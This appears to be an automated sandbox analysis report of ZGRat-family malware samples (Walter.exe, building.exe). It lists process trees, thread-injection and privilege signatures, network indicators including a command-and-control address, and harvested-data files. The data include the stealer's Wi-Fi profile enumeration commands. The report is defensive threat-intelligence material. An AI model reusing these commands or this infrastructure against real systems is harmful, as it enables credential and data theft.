"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F920421836A4D80FFB4795834086BD86 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=169BB5BAB9F9F7C182E71310ACE2C663 --mojo-platform-channel-handle=2412 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=94AD9E1E45E47E153EA99DEFD214CF1C --mojo-platform-channel-handle=2420 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CC4D037BE538E059872178F8193148FF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CC4D037BE538E059872178F8193148FF --renderer-client-id=8 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=236DD7BCEA487CAEDD45801581597C13 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=236DD7BCEA487CAEDD45801581597C13 --renderer-client-id=10 --mojo-platform-channel-handle=2684 --allow-no-sandbox-job /prefetch:1
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.37.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.98.74.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
memory/3916-28-0x0000000009770000-0x0000000009791000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | e5b1404a25894361f2981fd4d9b1fa01 |
| SHA1 | a5bd0a94f2bfab6b10dcc61280747e98dcb1448b |
| SHA256 | 02ac40ae1bba053d949c71fb2849105424a2db85b00a5029eb43c5c18d963724 |
| SHA512 | 84dcc3f6b2791d4c86948308151d9708c00fd84dea42fe27a05fab83bd30a21965c652fa9cb607013867d325a952aea67297bf9f8086403e9ebdd7c3d12a0fff |
memory/3916-133-0x0000000009770000-0x0000000009791000-memory.dmp
memory/3916-135-0x000000000A300000-0x000000000A44D000-memory.dmp
memory/3916-143-0x000000000A300000-0x000000000A44D000-memory.dmp
memory/3916-146-0x000000000A590000-0x000000000A5BA000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
144s
Max time network
151s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3580 set thread context of 1596 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| NL | 38.170.242.108:7785 | tcp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
Files
memory/3580-0-0x0000020FBB5C0000-0x0000020FBB728000-memory.dmp
memory/3580-2-0x00007FF813890000-0x00007FF814351000-memory.dmp
memory/3580-3-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-4-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-8-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-14-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-24-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-32-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-38-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-40-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-46-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-52-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-56-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-64-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-66-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-62-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-60-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-58-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-54-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-50-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-48-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-44-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-42-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-36-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-34-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-30-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-28-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-26-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-22-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-20-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-18-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-16-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-12-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-10-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-6-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-1-0x0000020FD5C80000-0x0000020FD5DE2000-memory.dmp
memory/3580-936-0x0000020FBD3A0000-0x0000020FBD3A1000-memory.dmp
memory/3580-935-0x0000020FD5C70000-0x0000020FD5C80000-memory.dmp
memory/3580-938-0x0000020FD5DE0000-0x0000020FD5E2C000-memory.dmp
memory/3580-937-0x0000020FD5B30000-0x0000020FD5C28000-memory.dmp
memory/1596-942-0x0000000140000000-0x00000001400D0000-memory.dmp
memory/1596-945-0x000001E14EE80000-0x000001E14EF8A000-memory.dmp
memory/1596-944-0x00007FF813890000-0x00007FF814351000-memory.dmp
memory/3580-943-0x00007FF813890000-0x00007FF814351000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Walter.exe.log
| MD5 | 9f5d0107d96d176b1ffcd5c7e7a42dc9 |
| SHA1 | de83788e2f18629555c42a3e6fada12f70457141 |
| SHA256 | d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097 |
| SHA512 | 86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61 |
memory/1596-3162-0x000001E14F030000-0x000001E14F0CE000-memory.dmp
memory/1596-3163-0x00007FF813890000-0x00007FF814351000-memory.dmp
memory/1596-3164-0x000001E14F020000-0x000001E14F030000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
16s
Max time network
152s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4824 set thread context of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 172.67.162.192:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 192.162.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| GB | 96.17.179.12:80 | tcp |
Files
memory/4824-0-0x00000000009D0000-0x00000000009E4000-memory.dmp
memory/4824-1-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/4824-2-0x0000000005550000-0x0000000005560000-memory.dmp
memory/4824-3-0x0000000002EA0000-0x0000000002EA6000-memory.dmp
memory/4824-4-0x0000000006E90000-0x000000000709A000-memory.dmp
memory/4824-5-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-8-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-10-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-6-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-14-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-16-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-18-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-20-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-24-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-26-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-28-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-30-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-22-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-32-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-34-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-38-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-40-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-36-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-42-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-44-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-46-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-50-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-52-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-56-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-54-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-58-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-60-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-62-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-64-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-48-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-68-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-66-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-12-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-937-0x0000000002DE0000-0x0000000002DE1000-memory.dmp
memory/4824-939-0x0000000007320000-0x000000000736C000-memory.dmp
memory/4824-938-0x0000000007430000-0x00000000075D2000-memory.dmp
memory/4824-940-0x0000000007C00000-0x00000000081A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\building.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/4824-947-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/1540-946-0x00000000056D0000-0x0000000005736000-memory.dmp
memory/1540-945-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/1540-944-0x0000000000400000-0x0000000000592000-memory.dmp
memory/1540-948-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/1540-953-0x0000000006000000-0x0000000006008000-memory.dmp
memory/1540-952-0x0000000005FD0000-0x0000000005FF6000-memory.dmp
memory/1540-951-0x0000000005F40000-0x0000000005FD2000-memory.dmp
memory/1540-955-0x0000000006E30000-0x0000000006E38000-memory.dmp
memory/1540-956-0x0000000006E50000-0x0000000006E6E000-memory.dmp
memory/1540-954-0x0000000006E20000-0x0000000006E2A000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
memory/1540-1012-0x0000000006F30000-0x0000000006FC2000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Process.txt
| MD5 | bf20b12d771f890a397436385c1bece5 |
| SHA1 | a4591d040c4a3cabf4d6273179cf498db097a3fd |
| SHA256 | 837fd30d574b109158bcba06387dbfad22c330f7742bb29c8f5c2e19d8f76e53 |
| SHA512 | 0e490228e2982e1e61384288a98d8c66535374b40601400e8e5a9c0c26421d2bf61de7e432b838be032cbb04b478fce39270275bdff7c48a9e2fc4a64871f9b8 |
memory/1540-1113-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/1540-1111-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/1540-1147-0x0000000007080000-0x00000000070FA000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt
| MD5 | 027a2c6780dfc5777707fc9fe796f5d6 |
| SHA1 | 3add6e59894483c20d09b4dd8623fa42a252495e |
| SHA256 | a19c1057e41ab8a3bc591f4d3ca2fb0a58f9fd34a300084580e14aa214fb3dc1 |
| SHA512 | fcede40cc3f6181b0c59849e966cf03324f305d6b38c05c21c8dacd5ac73a96178654871d39b903f0ffed6ae88ed5a9097a87e8d42544c621609c8767db245c4 |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt
| MD5 | 906c700315ca80c7952b464f3f93723f |
| SHA1 | a736b7cdea92db2e686737c4567b86c22ef66e3f |
| SHA256 | c55a28b0b4773dad67a0ea894c080d2398a0e686f1c355cedb7f7291637476e5 |
